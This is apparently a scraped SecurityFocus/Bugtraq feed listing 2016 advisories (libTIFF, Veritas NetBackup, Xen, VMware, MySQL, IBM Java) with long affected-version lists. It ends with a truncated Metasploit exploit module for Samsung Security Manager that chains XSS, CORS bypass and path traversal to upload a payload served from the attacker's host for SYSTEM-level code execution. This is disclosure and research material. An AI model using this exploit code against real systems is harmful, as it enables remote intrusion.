Execution

  • info
  • discussion
  • exploit
  • solution
  • references
libTIFF CVE-2016-8331 Type Confusion Remote Code Execution Vulnerability

Bugtraq ID: 93898
Class: Boundary Condition Error
CVE: CVE-2016-8331
Remote: Yes
Local: No
Published: Oct 25 2016 12:00AM
Updated: Nov 20 2016 12:03AM
Credit: Tyler Bohan and Cory Duplantis.
Vulnerable: LibTIFF LibTIFF 4.0.6
Not Vulnerable:


SecurityFocus Vulnerabilities

  • info
  • discussion
  • exploit
  • solution
  • references
Veritas NetBackup Appliance CVE-2016-7399 Arbitrary Command Execution Vulnerability

Bugtraq ID: 94384
Class: Input Validation Error
CVE: CVE-2016-7399
Remote: Yes
Local: No
Published: Nov 17 2016 12:00AM
Updated: Nov 17 2016 12:00AM
Credit: Matthew Hall.
Vulnerable: Veritas NetBackup Appliance 2.7.2
Veritas NetBackup Appliance 2.7.1
Veritas NetBackup Appliance 2.6.1.2
Veritas NetBackup Appliance 2.6.1.0
Veritas NetBackup Appliance 2.6.0.4
Veritas NetBackup Appliance 2.6.0.0
Not Vulnerable:


SecurityFocus Vulnerabilities

Vulnerable: SuSE Linux Enterprise Server 11 SP2 LTSS
QEMU QEMU 0
IBM PowerKVM 2.1.1 SP3
IBM PowerKVM 2.1.1 Build 65.7
IBM PowerKVM 2.1.1 Build 65.6
IBM PowerKVM 2.1.1 Build 65.5
IBM PowerKVM 2.1.1 Build 65.4
IBM PowerKVM 2.1.1 build 57
IBM PowerKVM 3.1.0.2
IBM PowerKVM 3.1 SP2
IBM PowerKVM 3.1 SP1
IBM PowerKVM 3.1 Build 3
IBM PowerKVM 3.1 Build 2
IBM PowerKVM 3.1
IBM PowerKVM 2.1.1.3-65.10
IBM PowerKVM 2.1.1.3-65
IBM PowerKVM 2.1.1 SP2 (build 51)
IBM PowerKVM 2.1.1 Build 65.1
IBM PowerKVM 2.1.1 build 58
IBM PowerKVM 2.1
Gentoo Linux


SecurityFocus Vulnerabilities

Vulnerable: Xen Xen 4.6
Xen Xen 4.5.0
Xen Xen 4.4.1
Xen Xen 4.4.0
Xen Xen 4.3.1
Xen Xen 4.3.0
Redhat Enterprise Virtualization 0
Redhat Enterprise Linux Workstation 7
Redhat Enterprise Linux Virtualization 5 Server
Redhat Enterprise Linux Server EUS 7.2
Redhat Enterprise Linux Server AUS 7.2
Redhat Enterprise Linux Server 7
Redhat Enterprise Linux HPC Node EUS 7.2
Redhat Enterprise Linux HPC Node 7
Redhat Enterprise Linux Desktop Multi OS 5 client
Redhat Enterprise Linux Desktop 7
QEMU QEMU 0
Oracle VM Server for x86 3.4
Oracle VM Server for x86 3.3
Oracle VM Server for x86 3.2
Oracle Enterprise Linux 5
HP Helion OpenStack 2.1.4
HP Helion OpenStack 2.1.2
HP Helion OpenStack 2.1
HP Helion OpenStack 2.0
Citrix XenServer 6.0.2 Common Criteria
Citrix XenServer 6.0.2
Citrix XenServer 6.5 Service Pack 1
Citrix XenServer 6.5
Citrix XenServer 6.2 Service Pack 1
Citrix XenServer 6.2
Citrix XenServer 6.1
Citrix XenServer 6.0


SecurityFocus Vulnerabilities

  • info
  • discussion
  • exploit
  • solution
  • references
LibTIFF '_TIFFVGetField()' Function Arbitrary Command Execution Vulnerability

Bugtraq ID: 85953
Class: Boundary Condition Error
CVE: CVE-2016-3632
Remote: Yes
Local: No
Published: Apr 08 2016 12:00AM
Updated: Sep 14 2016 07:00PM
Credit: Kaixiang Zhang of the Cloud Security Team, Qihoo 360
Vulnerable: Oracle VM Server for x86 3.4
Oracle VM Server for x86 3.3
Oracle Linux 7.0
Oracle Linux 6.0
LibTIFF LibTIFF 4.0.3
LibTIFF LibTIFF 4.0.2
LibTIFF LibTIFF 3.9.4
LibTIFF LibTIFF 3.9.3
LibTIFF LibTIFF 3.9.2
LibTIFF LibTIFF 3.9
LibTIFF LibTIFF 3.8.2
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
LibTIFF LibTIFF 3.8.1
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
LibTIFF LibTIFF 3.8
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
LibTIFF LibTIFF 3.7.4
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
LibTIFF LibTIFF 3.7.3
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
LibTIFF LibTIFF 3.7.2
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
LibTIFF LibTIFF 3.7.1
LibTIFF LibTIFF 3.7
+ Slackware Linux 10.0
+ Slackware Linux -current
LibTIFF LibTIFF 3.6.1
+ Gentoo Linux 1.4
+ Gentoo Linux
+ OpenPKG OpenPKG Current
+ Turbolinux Turbolinux Server 10.0
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
LibTIFF LibTIFF 3.6
LibTIFF LibTIFF 3.5.7
+ Redhat Fedora Core2
+ Slackware Linux 9.1
+ Slackware Linux 9.0
+ Slackware Linux 8.1
+ Turbolinux Appliance Server Hosting Edition 1.0
+ Turbolinux Appliance Server Workgroup Edition 1.0
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
LibTIFF LibTIFF 3.5.6
LibTIFF LibTIFF 3.5.5
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
LibTIFF LibTIFF 3.5.4
LibTIFF LibTIFF 3.5.3
LibTIFF LibTIFF 3.5.2
LibTIFF LibTIFF 3.5.1
LibTIFF LibTIFF 3.4
LibTIFF LibTIFF 4.0.6
LibTIFF LibTIFF 4.0.5
LibTIFF LibTIFF 4.0.4
LibTIFF LibTIFF 4.0.1
LibTIFF LibTIFF 4.0
LibTIFF LibTIFF 3.9.5
LibTIFF LibTIFF 3.9.1
IBM SmartCloud Entry 3.2
IBM SmartCloud Entry 3.1
IBM SmartCloud Entry 2.3 Fix Pack 1
IBM SmartCloud Entry 2.3 Appliance fix pack 6
IBM SmartCloud Entry 2.3 Appliance fix pack 4
IBM SmartCloud Entry 2.2 Fix Pack 2
IBM SmartCloud Entry 2.2 Fix Pack 1
IBM SmartCloud Entry 2.2 Appliance fix pack 6
IBM SmartCloud Entry 2.2 Appliance fix pack 4
IBM SmartCloud Entry 2.2
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 2.4.0.4 Appliance Fi
IBM SmartCloud Entry 2.4.0
IBM SmartCloud Entry 2.3.0.4 Appliance Fi
IBM SmartCloud Entry 2.3.0
IBM SmartCloud Entry 2.2.0.4 Appliance Fi
IBM SmartCloud Entry 2.2.0.3 Appliance FP
IBM SmartCloud Entry 2.2.0.3 Appliance FP
Not Vulnerable:


SecurityFocus Vulnerabilities

  • info
  • discussion
  • exploit
  • solution
  • references
Multiple VMware Workstation Products CVE-2016-7085 DLL Loading Remote Code Execution Vulnerability

Bugtraq ID: 92940
Class: Design Error
CVE: CVE-2016-7085
Remote: Yes
Local: No
Published: Sep 13 2016 12:00AM
Updated: Sep 13 2016 12:00AM
Credit: Stefan Kantha, Anand Bhat, and Himanshu Mehta.
Vulnerable: VMWare Workstation Pro 12.1.1
VMWare Workstation Pro 12.1
VMWare Workstation Player 12.1.1
VMWare Workstation Player 12.1
Not Vulnerable: VMWare Workstation Pro 12.5.0
VMWare Workstation Player 12.5


SecurityFocus Vulnerabilities

Vulnerable: Oracle Mysql 5.7.15
Oracle Mysql 5.7.12
Oracle Mysql 5.7.9
Oracle Mysql 5.7.8
Oracle Mysql 5.7.7
Oracle Mysql 5.7.6
Oracle Mysql 5.7.5
Oracle Mysql 5.7.4
Oracle Mysql 5.7.3
Oracle Mysql 5.7.2
Oracle Mysql 5.5.52
Oracle Mysql 5.5.49
Oracle Mysql 5.5.46
Oracle Mysql 5.5.45
Oracle Mysql 5.5.44
Oracle Mysql 5.5.43
Oracle Mysql 5.5.42
Oracle Mysql 5.5.41
Oracle Mysql 5.5.40
Oracle Mysql 5.5.39
Oracle Mysql 5.5.38
Oracle Mysql 5.5.37
Oracle Mysql 5.5.36
Oracle Mysql 5.5.35
Oracle Mysql 5.5.32
Oracle Mysql 5.5.31
Oracle Mysql 5.5.28
Oracle Mysql 5.5.27
Oracle Mysql 5.5.25
Oracle Mysql 5.5.24
Oracle Mysql 5.5.23
Oracle Mysql 5.5.22
Oracle Mysql 5.5.21
Oracle Mysql 5.5.20
Oracle Mysql 5.5.19
Oracle Mysql 5.5.18
Oracle Mysql 5.5.17
Oracle Mysql 5.5.16
Oracle Mysql 5.5.15
Oracle Mysql 5.5.14
Oracle Mysql 5.5.13
Oracle Mysql 5.5.12
Oracle Mysql 5.5.11
Oracle Mysql 5.5.10
Oracle Mysql 5.7.11
Oracle Mysql 5.7.10
Oracle Mysql 5.5.48
Oracle Mysql 5.5.47
Oracle Mysql 5.5.34
Oracle Mysql 5.5.33
Oracle Mysql 5.5.30
Oracle Mysql 5.5.29
Oracle Mysql 5.5.26


SecurityFocus Vulnerabilities

Bugtraq ID: 89192 Class: Unknown CVE: CVE-2016-0376 Remote: Yes Local: No Published: Apr 27 2016 12:00AM Updated: Aug 16 2016 06:00PM Credit: Adam Gowdiak of Security Explorations Vulnerable: Redhat Enterprise Linux Workstation Supplementary 7
Redhat Enterprise Linux Workstation Supplementary 6
Redhat Enterprise Linux Supplementary 5 server
Redhat Enterprise Linux Server Supplementary EUS 6.7.z
Redhat Enterprise Linux Server Supplementary 7
Redhat Enterprise Linux Server Supplementary 6
Redhat Enterprise Linux HPC Node Supplementary 7
Redhat Enterprise Linux HPC Node Supplementary 6
Redhat Enterprise Linux Desktop Supplementary 7
Redhat Enterprise Linux Desktop Supplementary 6
Redhat Enterprise Linux Desktop Supplementary 5 client
IBM Vios 2.2
IBM Tivoli Composite Application Manager for Transactions 7.4
IBM Tivoli Composite Application Manager for Transactions 7.3.0
IBM Tivoli Application Dependency Discovery Manager 7.2.1 3
IBM Tivoli Application Dependency Discovery Manager 7.2.1 2
IBM Tivoli Application Dependency Discovery Manager 7.2.1 1
IBM Tivoli Application Dependency Discovery Manager 7.2.1
IBM Tivoli Application Dependency Discovery Manager 7.3.0.3
IBM Tivoli Application Dependency Discovery Manager 7.2.2.5
IBM Tivoli Application Dependency Discovery Manager 7.2.1.6
IBM Tivoli Application Dependency Discovery Manager 7.2.1.5
IBM Tivoli Application Dependency Discovery Manager 7.2.1.4
IBM Tivoli Application Dependency Discovery Manager 7.2.0.9
IBM Tivoli Application Dependency Discovery Manager 7.2.0.8
IBM Tivoli Application Dependency Discovery Manager 7.2.0.7
IBM Tivoli Application Dependency Discovery Manager 7.2.0.6
IBM Tivoli Application Dependency Discovery Manager 7.2.0.5
IBM Tivoli Application Dependency Discovery Manager 7.2.0.4
IBM Tivoli Application Dependency Discovery Manager 7.2.0.3
IBM Tivoli Application Dependency Discovery Manager 7.2.0.2
IBM Tivoli Application Dependency Discovery Manager 7.2.0.10
IBM Tivoli Application Dependency Discovery Manager 7.2.0.1
IBM Tivoli Application Dependency Discovery Manager 7.2.0
IBM Tivoli Access Manager for e-business 6.1.1
IBM Tivoli Access Manager for e-business 6.1
IBM Tivoli Access Manager for e-business 6.0
IBM SmartCloud Entry 3.2
IBM SmartCloud Entry 3.1
IBM SmartCloud Entry 3.2.0.4 JRE Update 8
IBM SmartCloud Entry 3.2.0.3
IBM SmartCloud Entry 3.2.0.2
IBM SmartCloud Entry 3.2.0.1
IBM SmartCloud Entry 3.1.0.4 JRE Update 1
IBM SmartCloud Entry 3.1.0.3
IBM SmartCloud Entry 3.1.0.2
IBM SmartCloud Entry 3.1.0.1
IBM SmartCloud Entry 2.4.0.5 JRE Update 5
IBM SmartCloud Entry 2.4.0.3 Appliance FP
IBM SmartCloud Entry 2.4.0.3 Appliance FP
IBM SmartCloud Entry 2.4.0
IBM SmartCloud Entry 2.3.0.3 JRE Update 5
IBM SmartCloud Entry 2.3.0
IBM Security Access Manager for Web 8.0
IBM Security Access Manager for Web 7.0
IBM Security Access Manager for Mobile 8.0.0.3
IBM Security Access Manager for Mobile 8.0.0.2
IBM Security Access Manager for Mobile 8.0.0.1
IBM Security Access Manager for Mobile 8.0.0.0
IBM Security Access Manager 9.0.0.1
IBM Security Access Manager 9.0
IBM Rational Software Architect 9.1.2
IBM Rational Software Architect 8.5.5
IBM Rational Software Architect 8.5.1
IBM Rational Software Architect 9.5.0.1
IBM Rational Software Architect 9.5
IBM Rational Software Architect 9.1.2.1
IBM Rational Software Architect 9.1.1
IBM Rational Software Architect 9.1
IBM Rational Software Architect 9.0.0.1
IBM Rational Software Architect 9.0
IBM Rational Software Architect 8.5.5.4
IBM Rational Software Architect 8.5.5.3
IBM Rational Software Architect 8.5.5.2
IBM Rational Software Architect 8.5.5.1
IBM Rational Software Architect 8.5
IBM Rational Functional Tester 8.3 2
IBM Rational Functional Tester 8.6.0.7
IBM Rational Functional Tester 8.6.0.6
IBM Rational Functional Tester 8.6.0.5
IBM Rational Functional Tester 8.6.0.4
IBM Rational Functional Tester 8.6.0.3
IBM Rational Functional Tester 8.6.0.2
IBM Rational Functional Tester 8.6.0.1
IBM Rational Functional Tester 8.6
IBM Rational Functional Tester 8.5.1.3
IBM Rational Functional Tester 8.5.1.2
IBM Rational Functional Tester 8.5.1.1
IBM Rational Functional Tester 8.5.1
IBM Rational Functional Tester 8.5.0.1
IBM Rational Functional Tester 8.5
IBM Rational Functional Tester 8.3.0.1
IBM Rational Functional Tester 8.3
IBM Rational Developer for Power Systems Software 8.5.1
IBM Rational Developer for Power Systems Software 8.5
IBM Rational Developer for i 9.1.1
IBM Rational Developer for i 9.0 1
IBM Rational Developer for i 9.5.0.3
IBM Rational Developer for i 9.5.0.2
IBM Rational Developer for i 9.5.0.1
IBM Rational Developer for i 9.5
IBM Rational Developer for i 9.1.1.1
IBM Rational Developer for i 9.1
IBM Rational Developer for i 9.0.1
IBM Rational Developer for i 9.0
IBM Rational Developer for C/C++ 9.1.1
IBM Rational Developer for C/C++ 9.0.1
IBM Rational Developer for C/C++ 9.1.1.2
IBM Rational Developer for C/C++ 9.1
IBM Rational Developer for C/C++ 9.0.0.1
IBM Rational Developer for C/C++ 9.0
IBM Rational Developer for AIX and Linux 9.1.1
IBM Rational Developer for AIX and Linux 9.0 1
IBM Rational Developer for AIX and Linux 9.1.1.2
IBM Rational Developer for AIX and Linux 9.1.1.1
IBM Rational Developer for AIX and Linux 9.1
IBM Rational Developer for AIX and Linux 9.0.1
IBM Rational Developer for AIX and Linux 9.0
IBM Rational Developer for AIX and COBOL 9.1.1
IBM Rational Developer for AIX and COBOL 9.0.1
IBM Rational Developer for AIX and COBOL 9.1.1.2
IBM Rational Developer for AIX and COBOL 9.1
IBM Rational Developer for AIX and COBOL 9.0.0.1
IBM Rational Developer for AIX and COBOL 9.0
IBM QRadar 7.2
IBM QRadar 7.1
IBM OS Image for Red Hat 2.1.5.0
IBM OS Image for Red Hat 2.1.0.2
IBM OS Image for Red Hat 2.1.0.1
IBM OS Image for Red Hat 2.1.0.0
IBM OS Image for Red Hat 2.0.0.4
IBM OS Image for Red Hat 2.0.0.3
IBM OS Image for Red Hat 2.0.0.2
IBM OS Image for Red Hat 2.0.0.1
IBM OS Image for AIX 2.1.5.0
IBM OS Image for AIX 2.1.1.0
IBM OS Image for AIX 2.0.0.1
IBM OS Image for AIX 1.1.5.0
IBM Notes Standard Client 9.0.1 FP5 IF3
IBM Notes Standard Client 9.0.1
IBM Notes Standard Client 8.5.3 FP6IF10
IBM Notes Standard Client 8.5.3
IBM Notes Standard Client 8.5.2
IBM Notes Standard Client 8.5.1
IBM Notes Standard Client 9.0
IBM Notes Standard Client 8.5
IBM Java SDK 1.4.2
IBM Java SDK 8.0.1.10
IBM Java SDK 8.0.1.1
IBM Java SDK 8.0 SR2 FP10
IBM Java SDK 8.0
IBM Java SDK 8 SR2 FP10
IBM Java SDK 8 SR1-FP1
IBM Java SDK 8 SR1
IBM Java SDK 8 SR 2
IBM Java SDK 8 SR 1 FP 10
IBM Java SDK 8 SR 1 FP 1
IBM Java SDK 7R1 SR3-FP1
IBM Java SDK 7R1 SR3 FP30
IBM Java SDK 7R1 SR3
IBM Java SDK 7R1 SR2-FP10
IBM Java SDK 7R1 SR2
IBM Java SDK 7R1 SR1
IBM Java SDK 7R1 SR 3 FP 20
IBM Java SDK 7R1 SR 3 FP 10
IBM Java SDK 7R1 SR 3 FP 1
IBM Java SDK 7.1.3.30
IBM Java SDK 7.1.3.20
IBM Java SDK 7.1.3.10
IBM Java SDK 7.1.3.1
IBM Java SDK 7.1.2.10
IBM Java SDK 7.1.1.0 ~~Technology
IBM Java SDK 7.1.0.0 ~~Technology
IBM Java SDK 7.1 SR3 FP30
IBM Java SDK 7.1
IBM Java SDK 7.0.9.30
IBM Java SDK 7.0.9.20
IBM Java SDK 7.0.9.10
IBM Java SDK 7.0.9.1
IBM Java SDK 7.0.8.10
IBM Java SDK 7.0.7.0 ~~Technology
IBM Java SDK 7.0.6.1 ~~Technology
IBM Java SDK 7.0.6.0 ~~Technology
IBM Java SDK 7.0.5.0 ~~Technology
IBM Java SDK 7.0.4.2 ~~Technology
IBM Java SDK 7.0.4.1 ~~Technology
IBM Java SDK 7.0.4.0 ~~Technology
IBM Java SDK 7.0.3.0 ~~Technology
IBM Java SDK 7.0.2.0 ~~Technology
IBM Java SDK 7.0.1.0 ~~Technology
IBM Java SDK 7.0.0.0 ~~Technology
IBM Java SDK 7.0 SR8-FP10
IBM Java SDK 7.0
IBM Java SDK 7 SR9-FP1
IBM Java SDK 7 SR9 FP30
IBM Java SDK 7 SR9
IBM Java SDK 7 SR8-FP10
IBM Java SDK 7 SR8
IBM Java SDK 7 SR7
IBM Java SDK 7 SR5
IBM Java SDK 7 SR4-FP2
IBM Java SDK 7 SR4-FP1
IBM Java SDK 7 SR4
IBM Java SDK 7 SR3
IBM Java SDK 7 SR2
IBM Java SDK 7 SR1
IBM Java SDK 7 SR 9 FP 20
IBM Java SDK 7 SR 9 FP 10
IBM Java SDK 7 SR 9 FP 1
IBM Java SDK 7 R1
IBM Java SDK 7
IBM Java SDK 6R1 SR8-FP5
IBM Java SDK 6R1 SR8-FP4
IBM Java SDK 6R1 SR8-FP3
IBM Java SDK 6R1 SR8-FP2
IBM Java SDK 6R1 SR8 FP20
IBM Java SDK 6R1 SR8
IBM Java SDK 6R1 SR 8 FP 7
IBM Java SDK 6R1 SR 8 FP 5
IBM Java SDK 6R1 SR 8 FP 15
IBM Java SDK 6.1.8.7
IBM Java SDK 6.1.8.5
IBM Java SDK 6.1.8.4
IBM Java SDK 6.1.8.3
IBM Java SDK 6.1.8.20
IBM Java SDK 6.1.8.2
IBM Java SDK 6.1.8.15
IBM Java SDK 6.0.9.2 ~~Technology
IBM Java SDK 6.0.9.1 ~~Technology
IBM Java SDK 6.0.9.0 ~~Technology
IBM Java SDK 6.0.8.1 ~~Technology
IBM Java SDK 6.0.8.0 ~~Technology
IBM Java SDK 6.0.7.0 ~~Technology
IBM Java SDK 6.0.6.0 ~~Technology
IBM Java SDK 6.0.5.0 ~~Technology
IBM Java SDK 6.0.4.0 ~~Technology
IBM Java SDK 6.0.3.0 ~~Technology
IBM Java SDK 6.0.2.0 ~~Technology
IBM Java SDK 6.0.16.7
IBM Java SDK 6.0.16.5
IBM Java SDK 6.0.16.4
IBM Java SDK 6.0.16.3
IBM Java SDK 6.0.16.20
IBM Java SDK 6.0.16.2
IBM Java SDK 6.0.16.0 ~~Technolog
IBM Java SDK 6.0.15.1 ~~Technolog
IBM Java SDK 6.0.15.0 ~~Technolog
IBM Java SDK 6.0.14.0 ~~Technolog
IBM Java SDK 6.0.13.2 ~~Technolog
IBM Java SDK 6.0.13.1 ~~Technolog
IBM Java SDK 6.0.13.0 ~~Technolog
IBM Java SDK 6.0.12.0 ~~Technolog
IBM Java SDK 6.0.11.0 ~~Technolog
IBM Java SDK 6.0.10.1 ~~Technolog
IBM Java SDK 6.0.10.0 ~~Technolog
IBM Java SDK 6.0.1.0 ~~Technology
IBM Java SDK 6.0.1 SR6
IBM Java SDK 6.0.1 SR5-FP2
IBM Java SDK 6.0.1 SR5
IBM Java SDK 6.0.1 SR4
IBM Java SDK 6.0.1 SR3
IBM Java SDK 6.0.0.0 ~~Technology
IBM Java SDK 6.0 SR16-FP3
IBM Java SDK 6 SR16-FP5
IBM Java SDK 6 SR16-FP4
IBM Java SDK 6 SR16-FP3
IBM Java SDK 6 SR16-FP2
IBM Java SDK 6 SR16 FP20
IBM Java SDK 6 SR16
IBM Java SDK 6 SR14
IBM Java SDK 6 SR13-FP2
IBM Java SDK 6 SR13-FP1
IBM Java SDK 6 SR13
IBM Java SDK 6 SR12
IBM Java SDK 6 SR11
IBM Java SDK 6 SR10
IBM Java SDK 6 SR 16 FP 7
IBM Java SDK 6 SR 16 FP 5
IBM Java SDK 6 SR 16 FP 15
IBM Java SDK 6
IBM Java SDK 5
IBM Java 7 SR5
IBM InfoSphere Streams 4.1.1.0
IBM InfoSphere Streams 4.0.1.1
IBM InfoSphere Streams 3.2.1.4
IBM InfoSphere Streams 3.1.0.8
IBM InfoSphere Streams 3.0.0.6
IBM InfoSphere Streams 2.0.0.4
IBM InfoSphere Streams 1.2.1.0
IBM Image Construction and Composition Tool 2.3.2.0
IBM Image Construction and Composition Tool 2.3.1.0
IBM ILOG Optimization Decision Manager Enterprise 3.7.0.2
IBM ILOG Optimization Decision Manager Enterprise 3.6
IBM ILOG Optimization Decision Manager Enterprise 3.5
IBM i 7.3
IBM i 7.2
IBM i 7.1
IBM i 6.1
IBM Explorer for z/OS 3.0
IBM eDiscovery Analyzer 2.2.2
IBM eDiscovery Analyzer 2.2.1
IBM eDiscovery Analyzer 2.2
IBM Decision Optimization Center 3.8.0.2
IBM Decision Optimization Center 3.8
IBM CPLEX Optimization Studio 12.6.3
IBM CPLEX Optimization Studio 12.6.1
IBM CPLEX Optimization Studio 12.5.1
IBM CPLEX Optimization Studio 12.6.0.1
IBM CPLEX Optimization Studio 12.6
IBM CPLEX Optimization Studio 12.5.0.1
IBM CPLEX Optimization Studio 12.5
IBM CPLEX Optimization Studio 12.4.0.1
IBM CPLEX Optimization Studio 12.4
IBM CPLEX Enterprise Server 12.6.3
IBM CPLEX Enterprise Server 12.6.1
IBM CPLEX Enterprise Server 12.5.1
IBM CPLEX Enterprise Server 12.6.0.1
IBM CPLEX Enterprise Server 12.6
IBM CPLEX Enterprise Server 12.5.0.1
IBM CPLEX Enterprise Server 12.5
IBM CPLEX Enterprise Server 12.4.0.1
IBM CPLEX Enterprise Server 12.4
IBM Cloud Manager with Openstack 4.3
IBM Cloud Manager with Openstack 4.2
IBM Cloud Manager with Openstack 4.1
IBM Cloud Manager with Openstack 4.3.0.6
IBM Cloud Manager with Openstack 4.3.0.4
IBM Cloud Manager with Openstack 4.3.0.3
IBM Cloud Manager with Openstack 4.3.0.2
IBM Cloud Manager with Openstack 4.3.0.1
IBM Cloud Manager with Openstack 4.2.0.3 Interix Fix
IBM Cloud Manager with Openstack 4.2.0.2
IBM Cloud Manager with Openstack 4.2.0.1
IBM Cloud Manager with Openstack 4.1.0.5 Interim Fix
IBM Cloud Manager with Openstack 4.1.0.4
IBM Cloud Manager with Openstack 4.1.0.3
IBM Cloud Manager with Openstack 4.1.0.2
IBM Cloud Manager with Openstack 4.1.0.1
IBM Aix 7.2
IBM AIX 7.1
IBM AIX 6.1
IBM AIX 5.3 Not Vulnerable: IBM Security Access Manager for Web 8.0.1.4
IBM Security Access Manager for Mobile 8.0.1.4
IBM Security Access Manager 9.0.1.0
IBM Notes Standard Client 9.0.1 FP6
IBM Java SDK 8 SR 3
IBM Java SDK 8 SR 2 FP 14
IBM Java SDK 7R1 SR 3 FP 40
IBM Java SDK 7 SR 9 FP 40
IBM Java SDK 7 SR 9 FP 32
IBM Java SDK 6R1 SR 8 FP 25
IBM Java SDK 6R1 SR 8 FP 21
IBM Java SDK 6 SR 16 FP 25
IBM Java SDK 6 SR 16 FP 22


SecurityFocus Vulnerabilities

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::FileDropper

def initialize(info=)
super(update_info(info,
'Name' => "Samsung Security Manager 1.5 ActiveMQ Broker Service PUT Method Remote Code Execution",
'Description' => %q
This is an exploit against Samsung Security Manager that bypasses the patch in
CVE-2015-3435 by exploiting the vulnerability against the client side. This exploit has
been tested successfully against IE, FireFox and Chrome by abusing a GET request XSS to
bypass CORS and reach the vulnerable PUT. Finally, a traversal is used in the PUT request
to upload the code just where we want it and gain Remote Code Execution as SYSTEM.
,
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me <mr_me[at]offensive-security.com>', # vuln + module
],
'References' =>
[
[ 'URL', 'http://metasploit.com' ]
],
'Platform' => 'win',
'Targets' =>
[
# tested on 1.32, 1.4 & 1.5
[ 'Samsung Security Manager 1.32, 1.4 & 1.5 Universal', ],
],
'DisclosureDate' => "Aug 05 2016",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
], self.class)
end

# this is because String.fromCharCode has a max of 65535 func args
# thanks to sinn3r for his help with the Array->String conversion
def encode_js(string)
i = 0
encoded_0 = []
encoded_1 = []
string.each_byte do |c|
if i > 65534
encoded_1 << c
else
encoded_0 << c
end
i += 1
end
if i > 65534
return encoded_0 * ",", encoded_1 * ","
else
return encoded_0 * ","
end
end

# tested on Firefox v46.0.1 (latest)
# tested on Chrome v50.0.2661.102 (latest release)
# tested on IE v11.0.9600.18314 (latest)
def on_request_uri(cli, request)

js_name = rand_text_alpha(rand(10)+5) + '.js'

payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/" + js_name

# we deliver the JavaScript code that does the work for us
if (request.uri.match(/.js/))
return if ((p = regenerate_payload(cli)) == nil)

# dont exploit again otherwise we get a zillion shells
return if session_created? or @exploited

